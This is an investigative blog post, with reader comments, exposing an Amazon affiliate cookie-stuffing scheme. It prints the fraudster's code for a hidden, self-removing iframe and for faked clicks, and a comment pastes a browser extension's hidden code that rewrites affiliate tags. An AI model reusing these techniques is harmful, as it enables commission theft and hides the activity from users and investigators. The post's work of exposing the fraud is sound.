Cellphonetech stuffing Amazon cookies with heightened concealment

We’ve recently been watching an Amazon Associates fraudster taking remarkable efforts to cover his tracks.  Like many rogue Associates we’ve looked at, he’s stuffing cookies invisibly.  He’s using Flash-based stuffing, a technique first written up last year.  But he’s several notches more sophisticated than most:

The fraudster begins by buying a 125×125 IFRAME in the targeted site, here phonearena.com (much like the fraudster who targeted Venturebeat).

phonearena - affiliate fraud 1

But his Flash creates a doubly-invisible IFRAME — setting CSS visibility to “hidden” and also setting width and height to just 1 pixel each:

ExternalInterface.call("function(fffff) 
{ 
  var xxxxx = document.createElement (\'iframe\'); 
  xxxxx.id = \'xxxxx\'; 
  xxxxx.name = \'xxxxx\'; 
  xxxxx.style.visibility = \'hidden\'; 
  xxxxx.style.width = \'1px\';  
  xxxxx.style.height = \'1px\'; 
  var yyyyy = document.body; 
  yyyyy.appendChild (xxxxx); ...

If you’re hoping to see the fraudster’s IFRAME with ordinary visual inspection, you’ll be disappointed: it’s doubly-invisible, as instructed by the preceding code.

Second, the fraudster uses JavaScript to remove the IFRAME that stuffs Amazon cookies, just ten seconds after the IFRAME loads:

xxxxx.onload = function() 
{ 
  setTimeout (function() 
   {yyyyy.removeChild (xxxxx);}, 10000); 
 }; 
 xxxxx.src = fffff; }", arg1);

Any investigator wanting to find the fraudster’s IFRAME by inspecting the page DOM would have just ten seconds to do so — usually not enough.

Third, this fraudster is rotating among many Amazon Associates IDs.  We found one several months ago, then thirteen more this month.  By using multiple accounts, the fraudster spreads his earnings, and no single account stands out as unreasonably large.  Using many company names is relatively standard among folks with something to hide — recall Direct Revenue’s dozens of company names;.  (By using multiple names, companies seek to avoid the notoreity and additional scrutiny that could result from a single large identity.)  In contrast, any legitimate affiliate would want credit, recognition, and extra payment for its high traffic volume.  So spreading traffic across multiple IDs confirms that this fraudster knows it is breaking Amazon’s rules.

Relatedly, this fraudster carefully uses JavaScript to fake clicks such that HTTP Referers and other characteristics look legitimate when traffic reaches Amazon.  This method automatically causes HTTP Referer fields to take values consistent with the Associate IDs described above.  Here’s a sample of the code that fakes a click and causes HTTP Referers to flow accordingly:

var url="http://www.cellphonetech.net/ads/files/xx.php?dtecebenelcedteuea...";
var xxx = document.createElement ("a");
if (typeof(xxx.click) == 'undefined')
{ location.href = url;  }
else
{ xxx.href = url; document.body.appendChild(xxx); xxx.click(); }

Fourth, this fraudster is unusually cautious in how many users he stuffs.  In our testing, his ad stuffs only about one third of users.  Furthermore, he stuffs only on the first visit.  If your IP is not selected on the first visit, you will never be stuffed on any subsequent visit, no matter how many times you revisit.  He also limits his stuffing to certain geographies and with other restrictions we’ll save for another write-up.  Of course this caution comes at a cost — less stuffing relative to his media-buying costs — but the fraudster seems to find this profitable.  Specifically, this reduces his likelihood of detection — letting him continue at greater length.  Combining this caution with the fraudster’s use of Flash, double invisibility, and ten-second automatic removal from the DOM — and he’s unusually hard to catch.

How much money is this fraudster making?  We don’t know for sure, and Amazon has no reason to say.  But the fraudster is buying display ad space on a popular site (Alexa ranking <1500).  That can’t be cheap, and he must anticipate earning money more than enough to cover his costs.  As best we can tell, Amazon Associates is this fraudster’s entire business model, with no other networks being targeted — meaning that Amazon is paying the entire cost of this fraudster’s scheme.

Of course users see nothing — not even an extra popup or popunder.  Users do get a bit of bandwidth wasted by the extra page-load, but even folks on a mobile data plan probably wouldn’t notice.  The big loser is Amazon — paying affiliate fees, as much as 8%, to get traffic it otherwise would have received completely free.  We’re also struck by the losses to other affiliates: If another affiliate truly referred the user to Amazon, but this fraudster interceded to stuff its cookie, then the honest affiliate’s commission is stolen by this fraudster.

Here’s a sampling of the Amazon Associates IDs we’ve seen this fraudster using:

berryreview-20
fashionfunda-20
horrnigh-20
insidepulse0b-20
onlinecamer0a-20
rivcitspo-20
stratagonline-20
tecbitbytnib-20
tenetu-20
thechicfash04-20
zenilshroff-20

Full packet log of our first observation of this fraudster’s activities available here.

We call this fraudster Cellphonetech because his controlling server is cellphonetech dot net.  WHOIS indicates that the registrant is Lin Yong of Fujian China, email address joannatse01@gmail.com.

« »

5 Comments

  1. Thomas
    November 15, 2013

    I found a scammer myself.
    This chrome app (reported, so link will no longer work soon, I hope): https://chrome.google.com/webstore/detail/hide-seen-messages-for-fa/lfhfeiibjklgollkbbooaakbfhjinjjl/details
    inserts an amazon affiliate ID:

    chrome.tabs.onUpdated.addListener(function(e,t,n){var r="donations09-20";if(localStorage["affiliate_tag"]!==""&&localStorage["affiliate_tag"]!==undefined){r=localStorage["affiliate_tag"]}var i="chrome0f-20";if(localStorage["affiliate_tag_ca"]!==""&&localStorage["affiliate_tag_ca"]!==undefined){i=localStorage["affiliate_tag_ca"]}var s="chrome03-21";if(localStorage["affiliate_tag_couk"]!==""&&localStorage["affiliate_tag_couk"]!==undefined){s=localStorage["affiliate_tag_couk"]}var o="chrome0f-21";if(localStorage["affiliate_tag_de"]!==""&&localStorage["affiliate_tag_de"]!==undefined){o=localStorage["affiliate_tag_de"]}var u="chrome0a-21";if(localStorage["affiliate_tag_es"]!==""&&localStorage["affiliate_tag_es"]!==undefined){u=localStorage["affiliate_tag_es"]}var a="chrome08-21";if(localStorage["affiliate_tag_fr"]!==""&&localStorage["affiliate_tag_fr"]!==undefined){a=localStorage["affiliate_tag_fr"]}var f="chrome07-21";if(localStorage["affiliate_tag_it"]!==""&&localStorage["affiliate_tag_it"]!==undefined){f=localStorage["affiliate_tag_it"]}var l="chrome00-22";if(localStorage["affiliate_tag_cojp"]!==""&&localStorage["affiliate_tag_cojp"]!==undefined){l=localStorage["affiliate_tag_cojp"]}var c="chrome0a-23";if(localStorage["affiliate_tag_cn"]!==""&&localStorage["affiliate_tag_cn"]!==undefined){c=localStorage["affiliate_tag_cn"]}if(t.status=="loading"){if(n.url.indexOf("www.amazon.com")>0&&n.url.indexOf(r)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+r}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.ca")>0&&n.url.indexOf(i)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+i}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.co.uk")>0&&n.url.indexOf(s)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+s}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.de")>0&&n.url.indexOf(o)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+o}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.es")>0&&n.url.indexOf(u)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+u}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.fr")>0&&n.url.indexOf(a)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+a}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.it")>0&&n.url.indexOf(f)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+f}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.co.jp")>0&&n.url.indexOf(l)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+l}chrome.tabs.update(e,{url:n.url+h})}if(n.url.indexOf("www.amazon.cn")>0&&n.url.indexOf(c)<0&&n.url.indexOf("ref=ox_sc_proceed")<0&&n.url.indexOf("/cart/")<0&&n.url.indexOf("/buy/")0){h="&tag="+c}chrome.tabs.update(e,{url:n.url+h})}}});

  2. wesleyb
    November 15, 2013

    Note the different tags for each of the different regions. If this is doing what I think it’s doing then this is a good find.

  3. Bill
    November 18, 2013

    So how is he doing it?U have to install the app first?

  4. wesleyb
    November 18, 2013

    Yes

  5. Bill
    November 18, 2013

    Is this something similar to lilyjade?